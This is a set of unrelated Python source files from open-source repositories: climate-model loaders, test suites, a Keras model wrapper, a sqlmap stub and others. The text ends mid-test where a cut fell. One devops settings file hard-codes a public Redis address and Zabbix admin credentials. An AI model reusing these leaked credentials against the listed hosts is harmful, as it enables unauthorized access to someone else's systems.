def get_surface_shortwave_radiation_up(self, interval='monthly', **kwargs):
    """
    get surface shortwave upward radiation data for JSBACH

    Parameters
    ----------
    interval : str
        specifies the aggregation interval. Possible options: ['season','monthly']
    """
    settings = kwargs[self.type]
    # Fixed analysis period (TODO, as upstream: move this to the JSON
    # dictionary or some parameter file).
    start_date = '1980-01-01'
    stop_date = '2010-12-31'
    raw_file = '%s%s_jsbach_%s_%s.nc' % (self.data_dir, self.experiment,
                                         start_date[:4], stop_date[:4])
    return self._do_preprocessing(raw_file, 'swdown_reflect_acc', start_date,
                                  stop_date, interval=interval,
                                  valid_mask=settings['valid_mask'])
#-----------------------------------------------------------------------
def get_model_data_generic(self, interval='monthly', **kwargs):
    """
    This is only a wrapper to redirect to individual functions
    for the JSBACH_RAW class

    Currently only the usage for rainfall is supported!
    """
    # HACK: only a wrapper, should be depreciated
    # NOTE(review): the unconditional raise below makes the following call
    # unreachable -- rainfall analysis is deliberately disabled for now.
    raise ValueError('Rainfall analysis not working yet!')
    self.get_rainfall_data(interval=interval, **kwargs)
def get_rainfall_data(self, interval='monthly', **kwargs):
    """
    get surface rainfall data for JSBACH
    uses already preprocessed data where the convective and
    advective rainfall has been merged

    Parameters
    ----------
    interval : str
        specifies the aggregation interval. Possible options: ['season','monthly']
    """
    locdict = kwargs[self.type]

    y1 = '1980-01-01'  # TODO : move this to the JSON dictionary or some parameter file
    y2 = '2010-12-31'
    variable = 'aprc'
    # Pre-merged precipitation file produced by an external preprocessing
    # step; the glob pattern must resolve to exactly one file.
    rawfile = self.data_dir + self.experiment + '_echam6_echam_*_precipitation.nc'
    files = glob.glob(rawfile)
    if len(files) != 1:
        print 'Inputfiles: ', files
        raise ValueError('Something went wrong: Invalid number of input files!')
    else:
        rawfile = files[0]
    mdata, retval = self._do_preprocessing(rawfile, variable, y1, y2, interval=interval, valid_mask=locdict['valid_mask'])
    return mdata, retval
#-----------------------------------------------------------------------
def get_gpp_data(self, interval='season'):
    """
    get surface GPP data for JSBACH

    todo temporal aggregation of data --> or leave it to the user!
    """
    cdo = Cdo()
    v = 'var167'
    # Analysis period taken from the model's configured start/stop times.
    y1 = str(self.start_time)[0:10]
    y2 = str(self.stop_time)[0:10]
    rawfilename = self.data_dir + 'data/model/' + self.experiment + '_' + y1[0:4] + '-' + y2[0:4] + '.nc'
    times_in_file = int(''.join(cdo.ntime(input=rawfilename)))

    if interval == 'season':
        if times_in_file != 4:
            # File is not yet a seasonal climatology; aggregate it first.
            tmp_file = get_temporary_directory() + os.path.basename(rawfilename)
            cdo.yseasmean(options='-f nc -b 32 -r ', input='-selvar,' + v + ' ' + rawfilename, output=tmp_file[:-3] + '_yseasmean.nc')
            rawfilename = tmp_file[:-3] + '_yseasmean.nc'
    if interval == 'monthly':
        if times_in_file != 12:
            # File is not yet a monthly climatology; aggregate it first.
            tmp_file = get_temporary_directory() + os.path.basename(rawfilename)
            cdo.ymonmean(options='-f nc -b 32 -r ', input='-selvar,' + v + ' ' + rawfilename, output=tmp_file[:-3] + '_ymonmean.nc')
            rawfilename = tmp_file[:-3] + '_ymonmean.nc'
    if not os.path.exists(rawfilename):
        return None

    filename = rawfilename
    #--- read land-sea mask
    ls_mask = get_T63_landseamask(self.shift_lon)

    #--- read SW up data
    # NOTE(review): scale_factor appears to convert the accumulated flux to
    # gC m-2 a-1 assuming 30-day months and a 0.083 accumulation interval
    # -- confirm against the model's output conventions.
    gpp = Data4D(filename, v, read=True,
                 label=self.experiment + ' ' + v, unit='gC m-2 a-1', lat_name='lat', lon_name='lon',
                 shift_lon=self.shift_lon,
                 mask=ls_mask.data.data, scale_factor=3600. * 24. * 30. / 0.083
                 )

    return gpp.sum_data4D()
#-----------------------------------------------------------------------
| pygeo/pycmbs | pycmbs/benchmarking/models/mpi_esm.py | Python | mit | 41,720 |
#!/usr/bin/env python
#coding:utf-8
"""Deployment path and service settings for the ops app."""
import os

# Project root; every other local path below is derived from it, so
# relocating the project only requires changing this one value.
HOME = "/Users/wupeijin/code3/django-tornado"
# home_app=os.path.join(HOME,"mysite/mysite/cheungssh/")

dest_asset_dir = os.path.join(HOME, "tmp")
download_dir = os.path.join(HOME, "download")
upload_dir = os.path.join(HOME, "upload")
download_file_url = os.path.join(download_dir, "file")
keyfile_dir = os.path.join(HOME, "keys")
script_dir = os.path.join(HOME, "script")

# Redis connection settings.
redisip = '111.231.82.173'
redisport = 23456
redisdb = 0

# Mail (POP3) server used for inbound mail checks.
pop3_server = 'pop3.mxhichina.com'

# Zabbix monitoring endpoint.
# SECURITY: credentials are hard-coded in source; they should be moved to
# environment variables or a secrets store.
zabbixurl = 'http://47.94.89.135/zabbix'
zabbixuser = 'admin'
zabbixpwd = 'jinjin123'
| jinjin123/devops2.0 | devops/ops/views/ssh_settings.py | Python | mit | 671 |
#!/usr/bin/env python
# Script that generates some fake data for our library
"""Seed the library database with randomized authors, books, patrons and loans."""
import os, sys
sys.path.append(os.getcwd())
import django; django.setup()

import random
from django.utils import timezone

from stacks.models import Author, Book, LoanedBook
from libraryusers.models import LibraryUser

from faker import Factory
fake = Factory.create()

from datetime import date, timedelta

NUM_AUTHORS = 200
NUM_BOOKS = 500
NUM_PATRONS = 150

# Candidate checkout dates: today and each of the previous 20 days.
checkout_days = [(date.today() - timedelta(days=x)) for x in range(21)]

# Create a series of fake authors; also create at least one book for each author
for x in range(NUM_AUTHORS):
    author = Author.objects.create(first_name=fake.first_name(), last_name=fake.last_name())
    try:
        b = Book.objects.create(
            call_number=fake.numerify(text="###.###"),
            page_count=fake.random_int(min=10, max=1001),
            title=' '.join(fake.words(nb=fake.random_int(1,6))).title(),
        )
        b.authors.add(author)
        b.save()
    except Exception:
        # Best-effort seeding: skip books that violate a DB constraint
        # (e.g. a duplicate call_number).  Narrowed from a bare "except:",
        # which also swallowed SystemExit/KeyboardInterrupt.
        pass

# Create more books, each attributed to 1-3 randomly chosen authors.
authors = Author.objects.all()
for x in range(NUM_BOOKS):
    author_set = set()
    for y in range(fake.random_int(1,3)):
        author_set.add(random.choice(authors))
    try:
        b = Book.objects.create(
            call_number=fake.numerify(text="###.###"),
            page_count=fake.random_int(min=10, max=1001),
            title=' '.join(fake.words(nb=fake.random_int(1,6))).title(),
        )
        for author in author_set:
            b.authors.add(author)
        b.save()
    except Exception:
        # Same best-effort policy as above.
        pass

books = list(Book.objects.all())
random.shuffle(books)

# Create a bunch of users and loan books to them
for x in range(NUM_PATRONS):
    user_profile = fake.simple_profile()
    user = LibraryUser.objects.create(username=user_profile['username'], first_name=fake.first_name(),
        last_name=fake.last_name(), email=user_profile['mail'], is_staff=False, is_active=True,
        birthdate=user_profile['birthdate'], gender=user_profile['sex'], last_login=timezone.now())
    # Loan 1-5 distinct books to this patron with a 14-day loan period.
    # (Loop variable renamed: the original reused "x", shadowing the patron
    # loop index.)
    for _loan in range(fake.random_int(1,5)):
        book = books.pop()
        checkout_date = random.choice(checkout_days)
        due_date = checkout_date + timedelta(days=14)
        LoanedBook.objects.create(patron=user, book=book, checkout_date=checkout_date, due_date=due_date)
| jacinda/djangocon2015-admin-talk | library/scripts/generate_random_library.py | Python | gpl-2.0 | 2,331 |
"""
Simple diff FIR linear filter LV2 plugin with AudioLazy.
"""
class Metadata:
    # Plugin metadata consumed by the lz2lv2 tooling to generate the LV2
    # manifest for this plugin.
    author = "Danilo de Jesus da Silva Bellini"
    author_homepage = "http://github.com/danilobellini"
    author_email = "@".join(["danilo.bellini", "gmail.com"])  # assembled to avoid a literal address in source
    license = "GPLv3"
    name = "Diff"
    uri = author_homepage + "/lz2lv2/diff"
    lv2class = "Filter", "Highpass" # See all classes at
                                    # http://lv2plug.in/ns/lv2core/
# First-order difference filter y[n] = x[n] - x[n-1], written as an
# AudioLazy z-transform expression (the module docstring calls this a
# "diff FIR linear filter").  NOTE(review): ``z`` is not defined in this
# module; presumably lz2lv2/audiolazy injects it at build time -- confirm.
process = 1 - z ** -1
| danilobellini/lz2lv2 | diff.py | Python | gpl-3.0 | 465 |
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem):
    """File-system takeover stub for Microsoft Access.

    Access exposes no SQL primitives for reading or writing server-side
    files, so both operations are unsupported and raise immediately.
    """

    def __init__(self):
        GenericFilesystem.__init__(self)

    def readFile(self, rFile):
        # File read is impossible on this back-end; fail fast.
        raise SqlmapUnsupportedFeatureException(
            "on Microsoft Access it is not possible to read files")

    def writeFile(self, wFile, dFile, fileType=None, forceCheck=False):
        # File write is impossible on this back-end; fail fast.
        raise SqlmapUnsupportedFeatureException(
            "on Microsoft Access it is not possible to write files")
| glaudsonml/kurgan-ai | tools/sqlmap/plugins/dbms/access/filesystem.py | Python | apache-2.0 | 746 |
import numpy as np
import pandas as pd
from IPython import embed
from keras.models import load_model
from keras import backend as K
from qlknn.models.ffnn import determine_settings, _prescale, clip_to_bounds
def rmse(y_true, y_pred):
    """Root-mean-squared error built from Keras backend ops.

    Used both as a training metric and as the custom object required when
    re-loading saved models (see ``load_model(..., custom_objects=...)``).
    """
    squared_error = K.square(y_true - y_pred)
    return K.sqrt(K.mean(squared_error))
class KerasNDNN():
    # Wrapper that gives a trained Keras model the QLKNN "NDNN" interface:
    # it keeps the input/output standardization factors and clip bounds
    # alongside the model and applies them in get_output().

    def __init__(self, model, feature_names, target_names,
                 feature_prescale_factor, feature_prescale_bias,
                 target_prescale_factor, target_prescale_bias,
                 feature_min=None, feature_max=None,
                 target_min=None, target_max=None,
                 target_names_mask=None,
                 ):
        # model: a compiled/loaded Keras model; names and prescale values
        # are pandas Series indexed by variable name.
        self.model = model
        self._feature_names = feature_names
        self._target_names = target_names
        self._feature_prescale_factor = feature_prescale_factor
        self._feature_prescale_bias = feature_prescale_bias
        self._target_prescale_factor = target_prescale_factor
        self._target_prescale_bias = target_prescale_bias
        # Unspecified bounds default to +/-inf, i.e. no clipping.
        if feature_min is None:
            feature_min = pd.Series({var: -np.inf for var in self._feature_names})
        self._feature_min = feature_min
        if feature_max is None:
            feature_max = pd.Series({var: np.inf for var in self._feature_names})
        self._feature_max = feature_max
        if target_min is None:
            target_min = pd.Series({var: -np.inf for var in self._target_names})
        self._target_min = target_min
        if target_max is None:
            target_max = pd.Series({var: np.inf for var in self._target_names})
        self._target_max = target_max
        self._target_names_mask = target_names_mask

    def get_output(self, inp, clip_low=False, clip_high=False, low_bound=None, high_bound=None, safe=True, output_pandas=True, shift_output_by=0):
        """
        This should accept a pandas dataframe, and should return a pandas dataframe
        """
        nn_input, safe, clip_low, clip_high, low_bound, high_bound = \
            determine_settings(self, inp, safe, clip_low, clip_high, low_bound, high_bound)
        # Standardize the raw inputs with the stored factor/bias.
        nn_input = _prescale(nn_input,
                             self._feature_prescale_factor.values,
                             self._feature_prescale_bias.values)

        # Apply all NN layers an re-scale the outputs
        # NOTE(review): _branch1_names/_branch2_names are only defined on
        # subclasses (e.g. Daniel7DNN); this base class is not usable
        # directly -- confirm intended usage.
        branched_in = [nn_input.loc[:, self._branch1_names].values,
                       nn_input.loc[:, self._branch2_names].values]
        nn_out = self.model.predict(branched_in)  # Get prediction
        # Undo target standardization, apply the optional constant shift,
        # then clip to the requested bounds.
        output = (nn_out - np.atleast_2d(self._target_prescale_bias)) / np.atleast_2d(self._target_prescale_factor)
        output -= shift_output_by

        output = clip_to_bounds(output, clip_low, clip_high, low_bound, high_bound)

        if output_pandas:
            output = pd.DataFrame(output, columns=self._target_names)
            if self._target_names_mask is not None:
                output.columns = self._target_names_mask
        return output
class Daniel7DNN(KerasNDNN):
    # Concrete 7-input ETG-flux network: six features feed the first model
    # branch and Ate feeds the second branch.
    _branch1_names = ['Ati', 'An', 'q', 'smag', 'x', 'Ti_Te']
    _branch2_names = ['Ate']

    def __init__(self, model, feature_names, target_names,
                 feature_prescale_factor, feature_prescale_bias,
                 target_prescale_factor, target_prescale_bias,
                 feature_min=None, feature_max=None,
                 target_min=None, target_max=None,
                 target_names_mask=None,
                 ):
        super().__init__(model, feature_names, target_names,
                         feature_prescale_factor, feature_prescale_bias,
                         target_prescale_factor, target_prescale_bias,
                         feature_min=feature_min, feature_max=feature_max,
                         target_min=target_min, target_max=target_max,
                         target_names_mask=target_names_mask,
                         )
        # Output offset that makes the network return exactly zero at a
        # point where its internal ReLU gate is inactive (see find_shift).
        self.shift = self.find_shift()

    @classmethod
    def from_files(cls, model_file, standardization_file):
        # Build an instance from a saved Keras model plus the CSV holding
        # the per-variable means/stds used during training.
        model = load_model(model_file, custom_objects={'rmse': rmse})
        stds = pd.read_csv(standardization_file)

        feature_names = pd.Series(cls._branch1_names + cls._branch2_names)
        target_names = pd.Series(['efeETG_GB'])

        stds.set_index('name', inplace=True)
        # Was normalised to s=1, m=0
        s_t = 1
        m_t = 0
        s_sf = stds.loc[feature_names, 'std']
        s_st = stds.loc[target_names, 'std']
        m_sf = stds.loc[feature_names, 'mean']
        m_st = stds.loc[target_names, 'mean']
        # Map raw value x to standardized x' = factor * x + bias.
        feature_scale_factor = s_t / s_sf
        feature_scale_bias = -m_sf * s_t / s_sf + m_t
        target_scale_factor = s_t / s_st
        target_scale_bias = -m_st * s_t / s_st + m_t
        return cls(model, feature_names, target_names,
                   feature_scale_factor, feature_scale_bias,
                   target_scale_factor, target_scale_bias,
                   )

    def get_output(self, inp, clip_low=False, clip_high=False, low_bound=None, high_bound=None, safe=True, output_pandas=True, shift_output=True):
        # Same contract as the base class, but by default shifts the output
        # by self.shift so the predicted flux is exactly zero below threshold.
        if shift_output:
            shift_output_by = self.shift
        else:
            shift_output_by = 0
        output = super().get_output(inp, clip_low=clip_low, clip_high=clip_high, low_bound=low_bound, high_bound=high_bound, safe=safe, output_pandas=output_pandas, shift_output_by=shift_output_by)
        return output

    def find_shift(self):
        # Define a point where the relu is probably 0
        nn_input = pd.DataFrame({'Ati': 0, 'An': 0, 'q': 3, 'smag': 3.5, 'x': 0.69, 'Ti_Te': 1, 'Ate': -100}, index=[0])
        branched_in = [nn_input.loc[:, self._branch1_names].values,
                       nn_input.loc[:, self._branch2_names].values]
        # Get a function to evaluate the network up until the relu layer
        try:
            func = K.function(self.model.input, [self.model.get_layer('TR').output])
        except ValueError:
            raise Exception("'TR' layer not defined, shifting only relevant for new-style NNs")
        relu_out = func(branched_in)
        # Sanity check: the gate must actually be closed at this point,
        # otherwise the measured output is not the pure offset.
        if relu_out[0][0, 0] != 0:
            raise Exception('Relu is not zero at presumed stable point! Cannot find shift')
        nn_out = self.model.predict(branched_in)
        output = (nn_out - np.atleast_2d(self._target_prescale_bias)) / np.atleast_2d(self._target_prescale_factor)
        shift = output[0][0]
        return shift
if __name__ == '__main__':
    # Smoke test: load a trained network from disk and evaluate it on a
    # scan over Ate with all other inputs held fixed.
    nn = Daniel7DNN.from_files(
        '../../../IPP-Neural-Networks/Saved-Networks/2018-11-25_Run0161a.h5',
        'standardizations_training.csv')
    shift = nn.find_shift()

    scann = 200
    # Renamed from "input" to avoid shadowing the builtin.
    inp = pd.DataFrame()
    inp['Ate'] = np.array(np.linspace(0, 14, scann))
    inp['Ti_Te'] = np.full_like(inp['Ate'], 1.33)
    inp['An'] = np.full_like(inp['Ate'], 3.)
    inp['Ati'] = np.full_like(inp['Ate'], 5.75)
    inp['q'] = np.full_like(inp['Ate'], 3)
    inp['smag'] = np.full_like(inp['Ate'], 0.7)
    inp['x'] = np.full_like(inp['Ate'], 0.45)
    # Order the columns exactly as the network expects its features.
    inp = inp[nn._feature_names]

    fluxes = nn.get_output(inp)
    print(fluxes)
    embed()
| Karel-van-de-Plassche/QLKNN-develop | qlknn/models/kerasmodel.py | Python | mit | 7,180 |
#!/usr/bin/env python
"""
Created by howie.hu at 2018/5/28.
"""
import asyncio
import os
import sys
import pytest
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from owllook.spiders.heiyan_novel_info import HYNovelInfoItem
# Static fixture: the <head> section of a real heiyan.com novel page,
# letting the extractor test run without network access.
HTML = """
<!doctype html>
<!--[if lt IE 7]><html class="no-js ie6 oldie" lang="zh" xmlns:wb="http://open.weibo.com/wb"> <![endif]-->
<!--[if IE 7]><html class="no-js ie7 oldie" lang="zh" xmlns:wb="http://open.weibo.com/wb"> <![endif]-->
<!--[if IE 8]><html class="no-js ie8 oldie" lang="zh" xmlns:wb="http://open.weibo.com/wb"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="zh" xmlns:wb="http://open.weibo.com/wb"> <!--<![endif]--><head>
<title>神仙微信群无广告,神仙微信群最新章节全文阅读,向阳的心的小说_黑岩网_黑岩阅读网</title>
<meta name="keywords" content="神仙微信群,神仙微信群最新章节,神仙微信群无弹窗, 向阳的心">
<meta name="description" content="神仙微信群是由作者(向阳的心)著作的社会题材小说,神仙微信群TXT下载,黑岩每天第一时间内更新神仙微信群最新章节,欢迎收藏。">
<meta name="mobile-agent" content="format=xhtml;url=http://w.heiyan.com/book/62599">
<meta property="og:type" content="社会"/>
<meta property="og:title" content="神仙微信群"/>
<meta property="og:description" content="无意间加入了神仙微信群,生活就此嗨翻天……【黑岩第一部微信红包文,主编力荐好书】"/>
<meta property="og:image" content="http://b.heiyanimg.com/book/62599.jpg@!bm?4"/>
<meta property="og:url" content="http://www.heiyan.com/book/62599"/>
<meta property="og:novel:category" content="社会"/>
<meta property="og:novel:author" content=" 向阳的心"/>
<meta property="og:novel:book_name" content="神仙微信群"/>
<meta property="og:novel:status" content="连载中"/>
<meta property="og:novel:read_url" content="http://www.heiyan.com/book/62599"/>
<meta property="og:novel:update_time" content="昨天22:52"/>
<meta property="og:novel:latest_chapter_name" content="2362 禁忌之恋"/>
<meta property="og:novel:latest_chapter_url" content="http://www.heiyan.com/book/62599/2424103"/>
<link rel="stylesheet" type="text/css" href="http://st.heiyanimg.com/_static/components/jqueryui/themes/ui-lightness/jquery-ui.min.css" media="all" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Cache-Control" content="no-transform" />
"""
def test_heiyan_novel_info():
    """The item extractor should pull the novel title out of the fixture <head>."""
    url = 'http://www.heiyan.com/book/62599'  # source page of the fixture (kept for reference)
    event_loop = asyncio.get_event_loop()
    item_data = event_loop.run_until_complete(HYNovelInfoItem.get_item(html=HTML))
    assert item_data.novel_name == '神仙微信群'
| howie6879/novels-search | tests/test_heiyan_novel_info.py | Python | apache-2.0 | 2,784 |
# -*- coding: utf-8 -*-
# Copyright 2013 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from mock import patch
from sqlalchemy.sql import not_
from nailgun.db.sqlalchemy.models import Cluster
from nailgun.db.sqlalchemy.models import NetworkGroup
from nailgun.network.manager import NetworkManager
from nailgun.openstack.common import jsonutils
from nailgun.test.base import BaseIntegrationTest
from nailgun.test.base import reverse
class TestNovaNetworkConfigurationHandlerMultinode(BaseIntegrationTest):
    # REST-level tests of the nova-network configuration handler on a
    # plain multinode (non-HA) cluster.

    def setUp(self):
        # Each test runs against a freshly created cluster.
        super(TestNovaNetworkConfigurationHandlerMultinode, self).setUp()
        cluster = self.env.create_cluster(api=True)
        self.cluster = self.db.query(Cluster).get(cluster['id'])

    def test_get_request_should_return_net_manager_and_networks(self):
        response = self.env.nova_networks_get(self.cluster.id)
        data = jsonutils.loads(response.body)
        cluster = self.db.query(Cluster).get(self.cluster.id)

        self.assertEqual(data['networking_parameters']['net_manager'],
                         self.cluster.network_config.net_manager)
        # Every network group must be serialized with its basic fields.
        for network_group in cluster.network_groups:
            network = [i for i in data['networks']
                       if i['id'] == network_group.id][0]

            keys = [
                'name',
                'cluster_id',
                'vlan_start',
                'cidr',
                'id']

            for key in keys:
                self.assertEqual(network[key], getattr(network_group, key))

    def test_not_found_cluster(self):
        resp = self.env.nova_networks_get(self.cluster.id + 999,
                                          expect_errors=True)
        self.assertEqual(404, resp.status_code)

    def test_change_net_manager(self):
        self.assertEqual(self.cluster.network_config.net_manager,
                         'FlatDHCPManager')

        new_net_manager = {
            'networking_parameters': {'net_manager': 'VlanManager'}
        }
        self.env.nova_networks_put(self.cluster.id, new_net_manager)

        self.db.refresh(self.cluster)
        self.assertEqual(
            self.cluster.network_config.net_manager,
            new_net_manager['networking_parameters']['net_manager'])

    def test_change_dns_nameservers(self):
        new_dns_nameservers = {
            'networking_parameters': {
                'dns_nameservers': [
                    "208.67.222.222",
                    "208.67.220.220"
                ]
            }
        }
        self.env.nova_networks_put(self.cluster.id, new_dns_nameservers)

        self.db.refresh(self.cluster)
        self.assertEqual(
            self.cluster.network_config.dns_nameservers,
            new_dns_nameservers['networking_parameters']['dns_nameservers']
        )

    def test_refresh_mask_on_cidr_change(self):
        # Shrinking the management CIDR via the API must be persisted.
        response = self.env.nova_networks_get(self.cluster.id)
        data = jsonutils.loads(response.body)

        mgmt = [n for n in data['networks']
                if n['name'] == 'management'][0]
        cidr = mgmt['cidr'].partition('/')[0] + '/25'
        mgmt['cidr'] = cidr

        resp = self.env.nova_networks_put(self.cluster.id, data)
        self.assertEqual(resp.status_code, 202)
        task = jsonutils.loads(resp.body)
        self.assertEqual(task['status'], 'ready')

        self.db.refresh(self.cluster)
        mgmt_ng = [ng for ng in self.cluster.network_groups
                   if ng.name == 'management'][0]
        self.assertEqual(mgmt_ng.cidr, cidr)

    def test_wrong_net_provider(self):
        # Hitting the neutron handler on a nova-network cluster is a 400.
        resp = self.app.put(
            reverse(
                'NeutronNetworkConfigurationHandler',
                kwargs={'cluster_id': self.cluster.id}),
            jsonutils.dumps({}),
            headers=self.default_headers,
            expect_errors=True
        )
        self.assertEqual(resp.status_code, 400)
        self.assertEqual(
            resp.body,
            u"Wrong net provider - environment uses 'nova_network'"
        )

    def test_do_not_update_net_manager_if_validation_is_failed(self):
        # An invalid network in the payload must abort the whole update.
        new_net_manager = {
            'networking_parameters': {'net_manager': 'VlanManager'},
            'networks': [{'id': 500, 'vlan_start': 500}]
        }
        self.env.nova_networks_put(self.cluster.id, new_net_manager,
                                   expect_errors=True)

        self.db.refresh(self.cluster)
        self.assertNotEqual(
            self.cluster.network_config.net_manager,
            new_net_manager['networking_parameters']['net_manager'])

    def test_network_group_update_changes_network(self):
        network = self.db.query(NetworkGroup).filter(
            not_(NetworkGroup.name == "fuelweb_admin")
        ).first()
        self.assertIsNotNone(network)

        new_vlan_id = 500  # non-used vlan id
        new_nets = {'networks': [{'id': network.id,
                                  'vlan_start': new_vlan_id}]}

        resp = self.env.nova_networks_put(self.cluster.id, new_nets)
        self.assertEqual(resp.status_code, 202)
        self.db.refresh(network)
        self.assertEqual(network.vlan_start, 500)

    def test_update_networks_and_net_manager(self):
        network = self.db.query(NetworkGroup).filter(
            not_(NetworkGroup.name == "fuelweb_admin")
        ).first()
        new_vlan_id = 500  # non-used vlan id
        new_net = {'networking_parameters': {'net_manager': 'VlanManager'},
                   'networks': [{'id': network.id, 'vlan_start': new_vlan_id}]}
        self.env.nova_networks_put(self.cluster.id, new_net)

        self.db.refresh(self.cluster)
        self.db.refresh(network)
        self.assertEqual(
            self.cluster.network_config.net_manager,
            new_net['networking_parameters']['net_manager'])
        self.assertEqual(network.vlan_start, new_vlan_id)

    def test_networks_update_fails_with_wrong_net_id(self):
        new_nets = {'networks': [{'id': 500,
                                  'vlan_start': 500}]}

        resp = self.env.nova_networks_put(self.cluster.id, new_nets,
                                          expect_errors=True)
        self.assertEqual(202, resp.status_code)
        task = jsonutils.loads(resp.body)
        self.assertEqual(task['status'], 'error')
        self.assertEqual(
            task['message'],
            'Invalid network ID: 500'
        )

    def test_admin_public_floating_untagged_others_tagged(self):
        resp = self.env.nova_networks_get(self.cluster.id)
        data = jsonutils.loads(resp.body)
        for net in data['networks']:
            if net['name'] in ('fuelweb_admin', 'public', 'fixed'):
                self.assertIsNone(net['vlan_start'])
            else:
                self.assertIsNotNone(net['vlan_start'])

    def test_mgmt_storage_networks_have_no_gateway(self):
        resp = self.env.nova_networks_get(self.cluster.id)
        self.assertEqual(200, resp.status_code)
        data = jsonutils.loads(resp.body)
        for net in data['networks']:
            if net['name'] in ['management', 'storage']:
                self.assertIsNone(net['gateway'])

    def test_management_network_has_gw(self):
        # Patch the default metadata so management uses a gateway, then
        # check the API exposes it while storage stays gateway-less.
        net_meta = self.env.get_default_networks_metadata().copy()
        mgmt = filter(lambda n: n['name'] == 'management',
                      net_meta['nova_network']['networks'])[0]
        mgmt['use_gateway'] = True
        mgmt['gateway'] = '192.168.0.1'

        def get_new_networks_metadata():
            return net_meta

        self.env.get_default_networks_metadata = get_new_networks_metadata
        cluster = self.env.create(
            cluster_kwargs={},
            nodes_kwargs=[{"pending_addition": True}]
        )
        resp = self.env.nova_networks_get(cluster['id'])
        data = jsonutils.loads(resp.body)
        mgmt = filter(lambda n: n['name'] == 'management',
                      data['networks'])[0]
        self.assertEqual(mgmt['gateway'], '192.168.0.1')
        strg = filter(lambda n: n['name'] == 'storage',
                      data['networks'])[0]
        self.assertIsNone(strg['gateway'])

    def test_management_network_gw_set_but_not_in_use(self):
        # A gateway value that is configured but not flagged for use must
        # not be reported by the API.
        net_meta = self.env.get_default_networks_metadata().copy()
        mgmt = filter(lambda n: n['name'] == 'management',
                      net_meta['nova_network']['networks'])[0]
        mgmt['gateway'] = '192.168.0.1'
        self.assertEqual(mgmt['use_gateway'], False)

        def get_new_networks_metadata():
            return net_meta

        self.env.get_default_networks_metadata = get_new_networks_metadata
        cluster = self.env.create(
            cluster_kwargs={},
            nodes_kwargs=[{"pending_addition": True}]
        )
        resp = self.env.nova_networks_get(cluster['id'])
        data = jsonutils.loads(resp.body)
        for n in data['networks']:
            if n['name'] in ('management', 'storage'):
                self.assertIsNone(n['gateway'])
class TestNeutronNetworkConfigurationHandlerMultinode(BaseIntegrationTest):
    # REST-level tests of the neutron (GRE segmentation) network
    # configuration handler.

    def setUp(self):
        super(TestNeutronNetworkConfigurationHandlerMultinode, self).setUp()
        cluster = self.env.create_cluster(api=True,
                                          net_provider='neutron',
                                          net_segment_type='gre',
                                          mode='ha_compact'
                                          )
        self.cluster = self.db.query(Cluster).get(cluster['id'])

    def test_get_request_should_return_net_provider_segment_and_networks(self):
        response = self.env.neutron_networks_get(self.cluster.id)
        data = jsonutils.loads(response.body)
        cluster = self.db.query(Cluster).get(self.cluster.id)

        self.assertEqual(data['networking_parameters']['segmentation_type'],
                         self.cluster.network_config.segmentation_type)
        # Every network group must be serialized with its basic fields.
        for network_group in cluster.network_groups:
            network = [i for i in data['networks']
                       if i['id'] == network_group.id][0]

            keys = [
                'name',
                'cluster_id',
                'vlan_start',
                'cidr',
                'id']

            for key in keys:
                self.assertEqual(network[key], getattr(network_group, key))

    def test_get_request_should_return_vips(self):
        response = self.env.neutron_networks_get(self.cluster.id)
        data = jsonutils.loads(response.body)

        self.assertIn('public_vip', data)
        self.assertIn('management_vip', data)

    def test_not_found_cluster(self):
        resp = self.env.neutron_networks_get(self.cluster.id + 999,
                                             expect_errors=True)
        self.assertEqual(404, resp.status_code)

    def test_refresh_mask_on_cidr_change(self):
        # Shrinking the management CIDR via the API must be persisted.
        response = self.env.neutron_networks_get(self.cluster.id)
        data = jsonutils.loads(response.body)

        mgmt = [n for n in data['networks']
                if n['name'] == 'management'][0]
        cidr = mgmt['cidr'].partition('/')[0] + '/25'
        mgmt['cidr'] = cidr

        resp = self.env.neutron_networks_put(self.cluster.id, data)
        self.assertEqual(202, resp.status_code)
        task = jsonutils.loads(resp.body)
        self.assertEqual(task['status'], 'ready')

        self.db.refresh(self.cluster)
        mgmt_ng = [ng for ng in self.cluster.network_groups
                   if ng.name == 'management'][0]
        self.assertEqual(mgmt_ng.cidr, cidr)

    def test_do_not_update_net_segmentation_type(self):
        resp = self.env.neutron_networks_get(self.cluster.id)
        data = jsonutils.loads(resp.body)
        data['networking_parameters']['segmentation_type'] = 'vlan'

        resp = self.env.neutron_networks_put(self.cluster.id, data,
                                             expect_errors=True)
        self.assertEqual(202, resp.status_code)
        task = jsonutils.loads(resp.body)
        self.assertEqual(task['status'], 'error')
        self.assertEqual(
            task['message'],
            "Change of 'segmentation_type' is prohibited"
        )

    def test_network_group_update_changes_network(self):
        resp = self.env.neutron_networks_get(self.cluster.id)
        data = jsonutils.loads(resp.body)
        network = self.db.query(NetworkGroup).get(data['networks'][0]['id'])
        self.assertIsNotNone(network)

        data['networks'][0]['vlan_start'] = 500  # non-used vlan id

        resp = self.env.neutron_networks_put(self.cluster.id, data)
        self.assertEqual(resp.status_code, 202)
        self.db.refresh(network)
        self.assertEqual(network.vlan_start, 500)

    def test_update_networks_fails_if_change_net_segmentation_type(self):
        # Even a payload with otherwise-valid changes must be rejected if
        # it also tries to change the segmentation type.
        resp = self.env.neutron_networks_get(self.cluster.id)
        data = jsonutils.loads(resp.body)
        network = self.db.query(NetworkGroup).get(data['networks'][0]['id'])
        self.assertIsNotNone(network)

        data['networks'][0]['vlan_start'] = 500  # non-used vlan id
        data['networking_parameters']['segmentation_type'] = 'vlan'

        resp = self.env.neutron_networks_put(self.cluster.id, data,
                                             expect_errors=True)
        self.assertEqual(202, resp.status_code)
        task = jsonutils.loads(resp.body)
        self.assertEqual(task['status'], 'error')
        self.assertEqual(
            task['message'],
